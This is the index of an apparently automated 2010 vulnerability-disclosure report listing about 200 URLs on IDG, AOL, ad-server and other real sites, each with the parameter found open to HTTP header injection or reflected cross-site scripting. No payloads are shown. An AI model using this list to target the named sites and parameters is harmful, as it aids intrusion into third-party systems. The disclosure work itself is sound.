Proof of Concept Exploits for IDG Web Properties with Vendors

CWE-79 and CWE-113 Reports for IDG and Related Party Web Properties | Hoyt LLC Research

Report generated by XSS.CX at Thu Dec 16 09:40:33 CST 2010.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler | MSRC Reference | GOOG Reference | CVE-2010-3486 | CVE-2010-3425

Loading

1. HTTP header injection

1.1. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

1.2. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]

1.3. http://www.accelacomm.com/jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/ [REST URL parameter 2]

1.4. http://www.accelacomm.com/jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/ [REST URL parameter 3]

1.5. http://www.accelacomm.com/jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/ [REST URL parameter 4]

1.6. http://www.accelacomm.com/jaw/btob_smm_160/1/51217035/ [REST URL parameter 2]

1.7. http://www.accelacomm.com/jaw/btob_smm_160/1/51217035/ [REST URL parameter 3]

1.8. http://www.accelacomm.com/jaw/btob_smm_160/1/51217035/ [REST URL parameter 4]

1.9. http://www.accelacomm.com/jaw/btob_smm_728/1/51217035/ [REST URL parameter 2]

1.10. http://www.accelacomm.com/jaw/btob_smm_728/1/51217035/ [REST URL parameter 3]

1.11. http://www.accelacomm.com/jaw/btob_smm_728/1/51217035/ [REST URL parameter 4]

1.12. http://www.accelacomm.com/jef/51217035/ [REST URL parameter 2]

2. Cross-site scripting (reflected)

2.1. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 3]

2.2. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 4]

2.3. http://adam-service.app.aol.com/adam-services/api/media/getVideo [brightcoveId parameter]

2.4. http://adam-service.app.aol.com/adam-services/api/media/getVideo [version parameter]

2.5. http://adserver.adtech.de/ [adiframe|2.0|277|75593|1|246|target parameter]

2.6. http://adserver.adtech.de/ [adiframe|2.0|277|75593|1|246|target parameter]

2.7. http://adserver.adtech.de/ [name of an arbitrarily supplied request parameter]

2.8. http://adserver.adtech.de/addyn%7C2.0%7C277%7C75593%7C1%7C246%7Ctarget=_blank [name of an arbitrarily supplied request parameter]

2.9. http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [target parameter]

2.10. http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [target parameter]

2.11. http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [target parameter]

2.12. http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [target parameter]

2.13. http://adserver.adtech.de/addyn|2.0|277|75593|1|246|target=_blank [name of an arbitrarily supplied request parameter]

2.14. http://adserver.adtech.de/addyn|3.0|277|1028361|0|171|ADTECH [target parameter]

2.15. http://adserver.adtech.de/addyn|3.0|277|1028844|0|889|ADTECH [target parameter]

2.16. http://adserver.adtech.de/addyn|3.0|277|1028878|0|154|ADTECH [target parameter]

2.17. http://adserver.adtech.de/addyn|3.0|277|2144686|0|2130|ADTECH [target parameter]

2.18. http://adserver.adtech.de/addyn|3.0|277|2144687|0|2130|ADTECH [target parameter]

2.19. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [REST URL parameter 1]

2.20. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [name of an arbitrarily supplied request parameter]

2.21. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [target parameter]

2.22. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [target parameter]

2.23. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [REST URL parameter 1]

2.24. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [name of an arbitrarily supplied request parameter]

2.25. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [target parameter]

2.26. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [target parameter]

2.27. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [REST URL parameter 1]

2.28. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]

2.29. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [target parameter]

2.30. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [target parameter]

2.31. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [REST URL parameter 1]

2.32. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [name of an arbitrarily supplied request parameter]

2.33. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [target parameter]

2.34. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [target parameter]

2.35. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [REST URL parameter 1]

2.36. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [name of an arbitrarily supplied request parameter]

2.37. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [target parameter]

2.38. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [target parameter]

2.39. http://api.typepad.com/blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js [name of an arbitrarily supplied request parameter]

2.40. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]

2.41. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]

2.42. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]

2.43. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]

2.44. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]

2.45. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]

2.46. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]

2.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]

2.48. http://cdn.widgetserver.com/syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a/u/3/ [REST URL parameter 14]

2.49. http://cdn.widgetserver.com/syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a/u/3/ [REST URL parameter 4]

2.50. http://cdn.widgetserver.com/syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade0138/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d5/u/3/ [REST URL parameter 14]

2.51. http://cdn.widgetserver.com/syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade0138/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d5/u/3/ [REST URL parameter 4]

2.52. http://cdn.widgetserver.com/syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c/u/3/ [REST URL parameter 14]

2.53. http://cdn.widgetserver.com/syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c/u/3/ [REST URL parameter 4]

2.54. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 10]

2.55. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 11]

2.56. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 12]

2.57. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 4]

2.58. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 5]

2.59. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 6]

2.60. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 7]

2.61. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 8]

2.62. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 9]

2.63. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 10]

2.64. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 11]

2.65. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 12]

2.66. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 4]

2.67. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 5]

2.68. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 6]

2.69. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 7]

2.70. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 8]

2.71. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 9]

2.72. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 10]

2.73. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 11]

2.74. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 12]

2.75. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 4]

2.76. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 5]

2.77. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 6]

2.78. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 7]

2.79. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 8]

2.80. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 9]

2.81. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 10]

2.82. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 11]

2.83. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 12]

2.84. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 4]

2.85. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 5]

2.86. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 6]

2.87. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 7]

2.88. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 8]

2.89. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 9]

2.90. https://cxo.omeda.com/cgi-win/cio.cgi [REST URL parameter 1]

2.91. https://cxo.omeda.com/cgi-win/cio.cgi [REST URL parameter 2]

2.92. https://cxo.omeda.com/cgi-win/cio.cgi [name of an arbitrarily supplied request parameter]

2.93. http://digg.com/submit [REST URL parameter 1]

2.94. http://digg.com/submit/ [REST URL parameter 1]

2.95. https://h30406.www3.hp.com/campaigns/2010/promo/1-8KF4V/landing.php [name of an arbitrarily supplied request parameter]

2.96. http://hs.maas360.com/white-paper/ [REST URL parameter 1]

2.97. http://hs.maas360.com/white-paper/ [name of an arbitrarily supplied request parameter]

2.98. http://idg.com/ [name of an arbitrarily supplied request parameter]

2.99. http://idg.com/idgnetrssfeeds.nsf/html [REST URL parameter 2]

2.100. http://idg.com/idgnetrssfeeds.nsf/html [name of an arbitrarily supplied request parameter]

2.101. http://idg.com/idgnetrssfeeds.nsf/html [openpage parameter]

2.102. http://idg.com/www/HomeNew.nsf/docs/Brands [REST URL parameter 1]

2.103. http://idg.com/www/HomeNew.nsf/docs/Brands [REST URL parameter 3]

2.104. http://idg.com/www/HomeNew.nsf/docs/Brands [REST URL parameter 4]

2.105. http://idg.com/www/HomeNew.nsf/docs/Brands [name of an arbitrarily supplied request parameter]

2.106. http://idg.com/www/HomeNew.nsf/docs/FAQ [REST URL parameter 1]

2.107. http://idg.com/www/HomeNew.nsf/docs/FAQ [REST URL parameter 3]

2.108. http://idg.com/www/HomeNew.nsf/docs/FAQ [REST URL parameter 4]

2.109. http://idg.com/www/HomeNew.nsf/docs/FAQ [name of an arbitrarily supplied request parameter]

2.110. http://idg.com/www/HomeNew.nsf/docs/IDG_News [REST URL parameter 1]

2.111. http://idg.com/www/HomeNew.nsf/docs/IDG_News [REST URL parameter 3]

2.112. http://idg.com/www/HomeNew.nsf/docs/IDG_News [REST URL parameter 4]

2.113. http://idg.com/www/HomeNew.nsf/docs/IDG_News [name of an arbitrarily supplied request parameter]

2.114. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [REST URL parameter 1]

2.115. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [REST URL parameter 3]

2.116. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [REST URL parameter 4]

2.117. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [name of an arbitrarily supplied request parameter]

2.118. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [REST URL parameter 1]

2.119. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [REST URL parameter 3]

2.120. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [REST URL parameter 4]

2.121. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [name of an arbitrarily supplied request parameter]

2.122. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 1]

2.123. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 3]

2.124. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 4]

2.125. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [name of an arbitrarily supplied request parameter]

2.126. http://idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 1]

2.127. http://idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 3]

2.128. http://idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 4]

2.129. http://idg.com/www/HomeNew.nsf/docs/about_IDG [name of an arbitrarily supplied request parameter]

2.130. http://idg.com/www/HomeNew.nsf/docs/company_milestones [REST URL parameter 1]

2.131. http://idg.com/www/HomeNew.nsf/docs/company_milestones [REST URL parameter 3]

2.132. http://idg.com/www/HomeNew.nsf/docs/company_milestones [REST URL parameter 4]

2.133. http://idg.com/www/HomeNew.nsf/docs/company_milestones [name of an arbitrarily supplied request parameter]

2.134. http://idg.com/www/HomeNew.nsf/docs/contact_us [REST URL parameter 1]

2.135. http://idg.com/www/HomeNew.nsf/docs/contact_us [REST URL parameter 3]

2.136. http://idg.com/www/HomeNew.nsf/docs/contact_us [REST URL parameter 4]

2.137. http://idg.com/www/HomeNew.nsf/docs/contact_us [name of an arbitrarily supplied request parameter]

2.138. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [REST URL parameter 1]

2.139. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [REST URL parameter 3]

2.140. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [REST URL parameter 4]

2.141. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [name of an arbitrarily supplied request parameter]

2.142. http://idg.com/www/HomeNew.nsf/docs/idc [REST URL parameter 1]

2.143. http://idg.com/www/HomeNew.nsf/docs/idc [REST URL parameter 3]

2.144. http://idg.com/www/HomeNew.nsf/docs/idc [REST URL parameter 4]

2.145. http://idg.com/www/HomeNew.nsf/docs/idc [name of an arbitrarily supplied request parameter]

2.146. http://idg.com/www/HomeNew.nsf/docs/idg_executives [REST URL parameter 1]

2.147. http://idg.com/www/HomeNew.nsf/docs/idg_executives [REST URL parameter 3]

2.148. http://idg.com/www/HomeNew.nsf/docs/idg_executives [REST URL parameter 4]

2.149. http://idg.com/www/HomeNew.nsf/docs/idg_executives [name of an arbitrarily supplied request parameter]

2.150. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [REST URL parameter 1]

2.151. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [REST URL parameter 3]

2.152. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [REST URL parameter 4]

2.153. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [name of an arbitrarily supplied request parameter]

2.154. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [REST URL parameter 1]

2.155. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [REST URL parameter 3]

2.156. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [REST URL parameter 4]

2.157. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [name of an arbitrarily supplied request parameter]

2.158. http://idg.com/www/HomeNew.nsf/docs/licensing [REST URL parameter 1]

2.159. http://idg.com/www/HomeNew.nsf/docs/licensing [REST URL parameter 3]

2.160. http://idg.com/www/HomeNew.nsf/docs/licensing [REST URL parameter 4]

2.161. http://idg.com/www/HomeNew.nsf/docs/licensing [name of an arbitrarily supplied request parameter]

2.162. http://idg.com/www/HomeNew.nsf/docs/media_contacts [REST URL parameter 1]

2.163. http://idg.com/www/HomeNew.nsf/docs/media_contacts [REST URL parameter 3]

2.164. http://idg.com/www/HomeNew.nsf/docs/media_contacts [REST URL parameter 4]

2.165. http://idg.com/www/HomeNew.nsf/docs/media_contacts [name of an arbitrarily supplied request parameter]

2.166. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [REST URL parameter 1]

2.167. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [REST URL parameter 3]

2.168. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [REST URL parameter 4]

2.169. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [name of an arbitrarily supplied request parameter]

2.170. http://idg.com/www/HomeNew.nsf/docs/videos [REST URL parameter 1]

2.171. http://idg.com/www/HomeNew.nsf/docs/videos [REST URL parameter 3]

2.172. http://idg.com/www/HomeNew.nsf/docs/videos [REST URL parameter 4]

2.173. http://idg.com/www/HomeNew.nsf/docs/videos [name of an arbitrarily supplied request parameter]

2.174. http://idg.com/www/homenew.nsf [REST URL parameter 1]

2.175. http://idg.com/www/homenew.nsf [name of an arbitrarily supplied request parameter]

2.176. http://idg.com/www/homenew.nsf/06PageStyle.css [REST URL parameter 1]

2.177. http://idg.com/www/homenew.nsf/06PageStyle.css [REST URL parameter 3]

2.178. http://idg.com/www/homenew.nsf/06PageStyle.css [name of an arbitrarily supplied request parameter]

2.179. http://idg.com/www/homenew.nsf/DataRequestor.js [OpenJavascriptLibrary parameter]

2.180. http://idg.com/www/homenew.nsf/DataRequestor.js [REST URL parameter 1]

2.181. http://idg.com/www/homenew.nsf/DataRequestor.js [REST URL parameter 3]

2.182. http://idg.com/www/homenew.nsf/DataRequestor.js [name of an arbitrarily supplied request parameter]

2.183. http://idg.com/www/homenew.nsf/JSLib.js [OpenJavascriptLibrary parameter]

2.184. http://idg.com/www/homenew.nsf/JSLib.js [REST URL parameter 1]

2.185. http://idg.com/www/homenew.nsf/JSLib.js [REST URL parameter 3]

2.186. http://idg.com/www/homenew.nsf/JSLib.js [name of an arbitrarily supplied request parameter]

2.187. http://idg.com/www/homenew.nsf/ajaxroutine.js [OpenJavascriptLibrary parameter]

2.188. http://idg.com/www/homenew.nsf/ajaxroutine.js [REST URL parameter 1]

2.189. http://idg.com/www/homenew.nsf/ajaxroutine.js [REST URL parameter 3]

2.190. http://idg.com/www/homenew.nsf/ajaxroutine.js [name of an arbitrarily supplied request parameter]

2.191. http://idg.com/www/homenew.nsf/awmlib2.js [REST URL parameter 1]

2.192. http://idg.com/www/homenew.nsf/awmlib2.js [REST URL parameter 3]

2.193. http://idg.com/www/homenew.nsf/awmlib2.js [name of an arbitrarily supplied request parameter]

2.194. http://idg.com/www/homenew.nsf/core.js [OpenJavascriptLibrary parameter]

2.195. http://idg.com/www/homenew.nsf/core.js [REST URL parameter 1]

2.196. http://idg.com/www/homenew.nsf/core.js [REST URL parameter 3]

2.197. http://idg.com/www/homenew.nsf/core.js [name of an arbitrarily supplied request parameter]

